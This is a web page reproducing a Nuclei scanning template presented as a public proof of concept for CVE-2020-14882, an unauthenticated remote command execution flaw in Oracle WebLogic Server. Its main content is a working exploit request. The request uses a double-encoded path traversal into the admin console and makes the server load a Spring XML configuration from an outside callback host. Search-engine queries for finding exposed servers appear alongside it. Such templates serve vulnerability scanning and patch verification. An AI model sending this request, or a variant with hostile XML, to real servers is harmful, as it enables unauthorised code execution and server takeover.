CVE-2020-14882: Oracle Weblogic Server - Remote Command Execution

2025-08-01 Oracle Weblogic Server PoC Public

Description

Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.

PoC

id: CVE-2020-14882

info:
  name: Oracle Weblogic Server - Remote Command Execution
  author: dwisiswant0
  severity: critical
  description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.
  remediation: |
    Apply the latest security patches provided by Oracle to fix the vulnerability.
  reference:
    - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
    - https://www.oracle.com/security-alerts/cpuoct2020.html
    - https://twitter.com/jas502n/status/1321416053050667009
    - https://youtu.be/JFVDOIL0YtA
    - https://github.com/jas502n/CVE-2020-14882#eg
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14882
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-14882
    epss-score: 0.99997
    epss-percentile: 0.9999
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - http.title:"oracle peoplesoft sign-in"
      - product:"oracle weblogic"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: cve2020,cve,oracle,rce,weblogic,oast,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "ADMINCONSOLESESSION"

      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022100e36e8ddfc1fa58d185f9eb67a40b2f0b0445484779b445b5f4d40b75a2acf7d6022056322fcdd72535d47d32dd49ff355260e05293d1bb89b9068dc7f33a15165f12:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities